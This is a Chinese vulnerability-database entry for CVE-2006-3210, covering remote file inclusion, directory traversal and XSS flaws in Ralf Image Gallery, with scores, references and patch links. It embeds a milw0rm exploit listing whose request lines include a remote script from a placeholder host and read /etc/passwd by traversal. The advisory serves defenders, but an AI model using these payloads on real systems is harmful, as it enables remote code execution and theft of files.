CVE-2006-3210
CVSS5.1
发布时间 :2006-06-23 21:06:00
修订时间 :2011-08-10 00:00:00
NMCOE    

[原文]Ralf Image Gallery (RIG) 0.7.4 and other versions before 1.0, when register_globals is enabled, allows remote attackers to conduct PHP remote file inclusion and directory traversal attacks via URLs or ".." sequences in the (1) dir_abs_src parameter in (a) check_entry.php, (b) admin_album.php, (c) admin_image.php, and (d) admin_util.php; and the (2) dir_abs_admin_src parameter in admin_album.php and admin_image.php. NOTE: this issue can be leveraged to conduct cross-site scripting (XSS) attacks.


[CNNVD]Ralf Image Gallery 多个PHP远程文件包含和目录遍历漏洞(CNNVD-200606-466)

        Ralf Image Gallery (RIG) 在启用register_globals时,可以使远程攻击者借助(a) check_entry.php, (b) admin_album.php, (c) admin_image.php和(d) admin_util.php中的(1) dir_abs_src参数; 以及admin_album.php和admin_image.php中的 (2) dir_abs_admin_src参数中的URL或 ".."序列,进行PHP远程文件包含和目录遍历攻击。注意:此问题可用于进行跨站脚本(XSS) 攻击。

- CVSS (基础分值)

CVSS分值: 5.1 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: HIGH [漏洞利用存在特定的访问条件]
攻击向量: NETWORK [攻击者不需要获取内网访问权或本地访问权]
身份认证: NONE [漏洞利用无需身份认证]

- CWE (弱点类目)

CWE-94 [对生成代码的控制不恰当(代码注入)]

- CPE (受影响的平台与产品)

cpe:/a:le_ralf:ralf_image_gallery:0.7.3
cpe:/a:le_ralf:ralf_image_gallery:0.7.2
cpe:/a:le_ralf:ralf_image_gallery:0.7.1
cpe:/a:le_ralf:ralf_image_gallery:0.6.5
cpe:/a:le_ralf:ralf_image_gallery:0.7.5
cpe:/a:le_ralf:ralf_image_gallery:0.7.4
cpe:/a:le_ralf:ralf_image_gallery:0.7

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3210
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-3210
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200606-466
(官方数据源) CNNVD

- 其它链接及资源

http://secunia.com/advisories/20771
(VENDOR_ADVISORY)  SECUNIA  20771
http://xforce.iss.net/xforce/xfdb/27259
(UNKNOWN)  XF  rig-dirabssrc-dirabsadminsrc-file-include(27259)
http://xforce.iss.net/xforce/xfdb/27257
(UNKNOWN)  XF  rig-dirabssrc-dirabsadminsrc-xss(27257)
http://xforce.iss.net/xforce/xfdb/27256
(UNKNOWN)  XF  rig-dirabssrc-directory-traversal(27256)
http://www.vupen.com/english/advisories/2006/2477
(VENDOR_ADVISORY)  VUPEN  ADV-2006-2477
http://www.securityfocus.com/bid/18548
(UNKNOWN)  BID  18548
http://www.securityfocus.com/archive/1/archive/1/438645/100/100/threaded
(UNKNOWN)  BUGTRAQ  20060627 Re: [MajorSecurity #18] Ralf Image Gallery <=0.7.4 - Multiple XSS, Remote File Include and directory traversal vulnerabilities
http://www.securityfocus.com/archive/1/archive/1/437818/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060620 [MajorSecurity #18] Ralf Image Gallery <=0.7.4 - Multiple XSS, Remote File Include and directory traversal vulnerabilities
http://www.osvdb.org/26756
(UNKNOWN)  OSVDB  26756
http://www.osvdb.org/26755
(UNKNOWN)  OSVDB  26755
http://www.osvdb.org/26754
(UNKNOWN)  OSVDB  26754
http://www.osvdb.org/26753
(UNKNOWN)  OSVDB  26753
http://www.majorsecurity.de/advisory/major_rls18.txt
(UNKNOWN)  MISC  http://www.majorsecurity.de/advisory/major_rls18.txt
http://securityreason.com/securityalert/1136
(UNKNOWN)  SREASON  1136
http://rig.powerpulsar.com/#news
(UNKNOWN)  CONFIRM  http://rig.powerpulsar.com/#news

- 漏洞信息

Ralf Image Gallery 多个PHP远程文件包含和目录遍历漏洞
中危 跨站脚本
2006-06-23 00:00:00 2007-08-01 00:00:00
远程  
        Ralf Image Gallery (RIG) 在启用register_globals时,可以使远程攻击者借助(a) check_entry.php, (b) admin_album.php, (c) admin_image.php和(d) admin_util.php中的(1) dir_abs_src参数; 以及admin_album.php和admin_image.php中的 (2) dir_abs_admin_src参数中的URL或 ".."序列,进行PHP远程文件包含和目录遍历攻击。注意:此问题可用于进行跨站脚本(XSS) 攻击。

- 公告与补丁

        目前厂商已经发布了相关补丁,请到厂商的主页下载:
        Ralf Image Gallery RIG 0.6.5
        Ralf Image Gallery rig_2006-06-24_v10.tgz
        http://prdownloads.sourceforge.net/rig-thumbnail/rig_2006-06-24_v10.tg z?download
        Ralf Image Gallery RIG 0.7.4
        Ralf Image Gallery rig_2006-06-24_v10.tgz
        http://prdownloads.sourceforge.net/rig-thumbnail/rig_2006-06-24_v10.tg z?download
        Ralf Image Gallery RIG 0.7.5
        Ralf Image Gallery rig_2006-06-24_v10.tgz
        http://prdownloads.sourceforge.net/rig-thumbnail/rig_2006-06-24_v10.tg z?download
        

- 漏洞信息 (1942)

Ralf Image Gallery <= 0.7.4 Multiple Remote Vulnerabilities (EDBID:1942)
php webapps
2006-06-22 Verified
0 Aesthetico
N/A [点击下载]
Title: Ralf Image Gallery <= 0.7.4 - Multiple Remote File Include and directory
traversal Vulnerabilities
-----------------------------------------------------------------
Vendor: RIG is developed and maintained by Le R'alf
URL: http://rig.powerpulsar.com/
-----------------------------------------------------------------

Credits:
Discovered by: 'Aesthetico'
http://www.majorsecurity.de
-----------------------------------------------------------------

Exploitation:
-----------------------------------------------------------------

/check_entry.php?dir_abs_src=http://www.yourspace.com/yourscript.php?
/check_entry.php?dir_abs_src=../../../../../../../../../etc/passwd%00
/admin_album.php?dir_abs_admin_src=http://www.yourspace.com/yourscript.php?
/admin_image.php?dir_abs_admin_src=http://www.yourspace.com/yourscript.php?
/admin_translate.php?dir_abs_admin_src=http://www.yourspace.com/yourscript.php?

# milw0rm.com [2006-06-22]
		

- 漏洞信息

26753
Ralf Image Gallery check_entry.php dir_abs_src Parameter Remote File Inclusion
Remote / Network Access Input Manipulation
Loss of Integrity

- 漏洞描述

Ralf Image Gallery (R.I.G.) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the check_entry.php script not properly sanitizing user input supplied to the 'dir_abs_src' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script. Additionally, this can be used to access arbitrary files via directory traversal style attacks (../../), or conduct cross-site scripting (XSS) attacks allowing for the execution of arbitrary code in a user's browser within the trust relationship between the browser and the server.

- 时间线

2006-06-20 Unknow
Unknow Unknow

- 解决方案

Upgrade to version 1.0 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站